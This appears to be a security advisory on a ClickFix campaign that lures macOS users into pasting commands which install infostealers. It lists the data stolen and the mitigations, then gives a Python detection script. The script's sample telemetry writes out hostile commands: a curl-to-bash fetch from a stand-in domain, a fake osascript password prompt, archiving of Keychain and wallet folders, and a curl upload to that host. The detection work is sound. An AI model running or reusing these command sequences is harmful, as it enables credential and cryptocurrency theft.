ClickFix Campaign Uses Fake macOS Utilities to Deliver Infostealers

Executive Summary

According to a report from the Microsoft Defender security research team published on 6 May 2026, an active “ClickFix” campaign is targeting macOS users through fake utility and troubleshooting lures. The campaign uses deceptive prompts masquerading as system fixes or macOS utilities to trick users into copying and manually executing malicious terminal commands themselves, so no software vulnerability is exploited.

In the past two years, RH-ISAC members have reported a steady volume of ClickFix activity targeting their brands, and members are encouraged to review the technical details below to maintain situational awareness of ongoing developments in the ClickFix threat landscape.

Key Takeaways

  • The campaign targets macOS users through fake utility and troubleshooting-themed lures. 
  • The campaign relies primarily on user interaction and deception rather than exploiting a software vulnerability.
  • Observed malware payloads include Atomic macOS Stealer (AMOS), MacSync, and Shub Stealer. 
  • The malware was observed collecting sensitive user data, including Keychain entries, browser credentials and other browser data, iCloud account data, notes, media files, Telegram data, and cryptocurrency wallet information.
  • The malware targets multiple file types for exfiltration, including TXT, PDF, DOCX, wallet, key, JPEG, PNG, KDBX, RTF, and seed-related files.
  • In some observed cases, legitimate cryptocurrency wallet applications were replaced with trojanized versions.
  • The malware was observed targeting multiple cryptocurrency wallet applications for data theft and exfiltration, including Electrum, Exodus, Atomic, Ledger Live, Monero, Dogecoin, Trezor Suite, and Sparrow.

IOCs

The Microsoft Defender security research team has provided a list of indicators of compromise (IOCs), available here: ClickFix IOCs

Mitigation Options

The Microsoft Defender security research team has provided the following mitigations: 

  • Educate users: Warn them against running instructions from untrusted sources.
  • Monitor Terminal usage: Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
  • Detect native tool abuse: Flag unusual sequences of macOS utilities (curl, base64, gunzip, osascript, and dscl).
  • Inspect outbound downloads: Monitor curl activity fetching encoded or compressed payloads from unknown domains.
  • Protect credential stores: Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
  • Monitor data staging: Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
  • Enable endpoint protection: Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
  • Restrict C2 traffic: Block outbound connections to suspicious or newly registered domains.
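The behavioural mitigations above (shells spawned by non-terminal apps, curl followed by base64/gunzip/osascript, downloads from unknown hosts, and sensitive-file archiving followed by an HTTP upload) map directly onto process-start telemetry. The following is an added example written for this post, not Microsoft's or RH-ISAC's detection content. It runs four rules over a constructed, simplified process-event feed; the field names (`t`, `session`, `parent`, `proc`, `cmd`), the allowlisted hosts, the time windows and the sample domain `fix-macos-audio.example` are all assumptions for illustration.

```python
"""Process-telemetry rules for the ClickFix/macOS-stealer behaviours above.

Added example for this post (not Microsoft or RH-ISAC detection content).
Each event is one process start as an EDR might export it; the schema and
all sample values below are constructed for illustration.
"""
import shlex
from collections import defaultdict
from urllib.parse import urlparse

SHELLS = {"sh", "bash", "zsh"}
DECODE_TOOLS = {"base64", "gunzip", "osascript", "dscl"}
EXPECTED_SHELL_PARENTS = {"Terminal", "iTerm2", "sshd", "launchd", "login", *SHELLS}
ARCHIVERS = {"zip", "tar", "ditto"}
SENSITIVE_PATHS = ("Library/Keychains", "Library/Cookies", "/.ssh", "Login Data",
                   "Application Support/Exodus", "Application Support/Electrum",
                   "Application Support/Ledger Live", "Application Support/Telegram Desktop")
TRUSTED_HOSTS = {"apple.com", "github.com", "githubusercontent.com"}  # assumed allowlist

# Constructed sample telemetry (hypothetical values).
SAMPLE_EVENTS = [
    # Session 7: user pastes a ClickFix one-liner into Terminal; zsh forks each pipeline stage.
    {"t": 100, "session": 7, "parent": "Terminal", "proc": "zsh", "cmd": "zsh -l"},
    {"t": 101, "session": 7, "parent": "zsh", "proc": "curl", "cmd": "curl -fsSL https://fix-macos-audio.example/up"},
    {"t": 101, "session": 7, "parent": "zsh", "proc": "base64", "cmd": "base64 -d"},
    {"t": 101, "session": 7, "parent": "zsh", "proc": "gunzip", "cmd": "gunzip"},
    {"t": 101, "session": 7, "parent": "zsh", "proc": "bash", "cmd": "bash"},
    {"t": 102, "session": 7, "parent": "bash", "proc": "osascript",
     "cmd": "osascript -e 'display dialog \"macOS needs your password to apply the fix\" default answer \"\" with hidden answer'"},
    {"t": 104, "session": 7, "parent": "bash", "proc": "zip",
     "cmd": "zip -r /tmp/out.zip /Users/alice/Library/Keychains '/Users/alice/Library/Application Support/Exodus'"},
    {"t": 106, "session": 7, "parent": "bash", "proc": "curl",
     "cmd": "curl -s -X POST -F file=@/tmp/out.zip https://fix-macos-audio.example/upload"},
    # Session 9: a fake "utility" app launches a shell directly, with no terminal involved.
    {"t": 200, "session": 9, "parent": "MacCleanerFix", "proc": "sh", "cmd": "sh -c ./fix.sh"},
    # Session 11: routine admin activity that should not fire any rule.
    {"t": 300, "session": 11, "parent": "zsh", "proc": "curl",
     "cmd": "curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh -o /tmp/install.sh"},
    {"t": 320, "session": 11, "parent": "zsh", "proc": "zip", "cmd": "zip -r /tmp/report.zip /Users/alice/Documents/report"},
]


def _argv(cmd):
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a naive split rather than drop the event
        return cmd.split()


def _by_session(events):
    groups = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["t"]):
        groups[ev["session"]].append(ev)
    return groups


def _is_upload(argv):
    """True if a curl command line sends data (form/body/upload or explicit POST/PUT)."""
    for i, a in enumerate(argv):
        if a in {"-F", "-d", "--data", "--data-binary", "-T", "--upload-file"}:
            return True
        if a in ("-X", "--request") and i + 1 < len(argv) and argv[i + 1].upper() in {"POST", "PUT"}:
            return True
    return False


def shell_from_unexpected_parent(ev):
    """Rule 1: a shell whose parent is not a terminal, sshd, login or another shell."""
    return ev["proc"] in SHELLS and ev["parent"] not in EXPECTED_SHELL_PARENTS


def curl_to_unknown_host(ev, trusted=TRUSTED_HOSTS):
    """Rule 2: curl fetching a URL whose host is outside the allowlist; returns the host or None."""
    if ev["proc"] != "curl":
        return None
    for arg in _argv(ev["cmd"]):
        if arg.startswith(("http://", "https://")):
            host = urlparse(arg).hostname or ""
            if not any(host == t or host.endswith("." + t) for t in trusted):
                return host
    return None


def lolbin_chains(events, window=30):
    """Rule 3: curl followed, in the same session within `window` seconds, by two or more
    of base64/gunzip/osascript/dscl. Returns (session, curl_time, sorted tool names)."""
    hits = []
    for sid, evs in _by_session(events).items():
        for i, ev in enumerate(evs):
            if ev["proc"] != "curl":
                continue
            followers = {e["proc"] for e in evs[i + 1:]
                         if e["t"] - ev["t"] <= window and e["proc"] in DECODE_TOOLS}
            if len(followers) >= 2:
                hits.append((sid, ev["t"], sorted(followers)))
    return hits


def staging_then_exfil(events, window=120):
    """Rule 4: an archiver touching a sensitive path, followed in the same session by a curl upload."""
    hits = []
    for sid, evs in _by_session(events).items():
        for i, ev in enumerate(evs):
            argv = _argv(ev["cmd"])
            if ev["proc"] not in ARCHIVERS or not any(p in a for a in argv for p in SENSITIVE_PATHS):
                continue
            for later in evs[i + 1:]:
                if later["t"] - ev["t"] > window:
                    break
                if later["proc"] == "curl" and _is_upload(_argv(later["cmd"])):
                    hits.append((sid, ev["t"], later["t"]))
                    break
    return hits


def run(events):
    """Apply all four rules and return the alerts keyed by rule name."""
    return {
        "shell_from_unexpected_parent": [(e["session"], e["parent"], e["proc"])
                                         for e in events if shell_from_unexpected_parent(e)],
        "curl_to_unknown_host": sorted({h for e in events if (h := curl_to_unknown_host(e))}),
        "lolbin_chains": lolbin_chains(events),
        "staging_then_exfil": staging_then_exfil(events),
    }


if __name__ == "__main__":
    for rule, alerts in run(SAMPLE_EVENTS).items():
        print(f"{rule}: {alerts}")
```

Two design points matter in production. Rule 3 keys on the session rather than on direct parent/child links, because a pasted `curl ... | base64 -d | gunzip | bash` pipeline appears as sibling processes under the shell, not as a chain. Rule 4 checks the archiver's arguments for sensitive paths before it looks for the upload, so ordinary `zip -r` of a project folder followed by an API call does not fire; tune `SENSITIVE_PATHS` and the time windows to your fleet, and treat the host allowlist as a noise filter rather than a trust decision, since first-stage payloads are also hosted on reputable CDNs.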
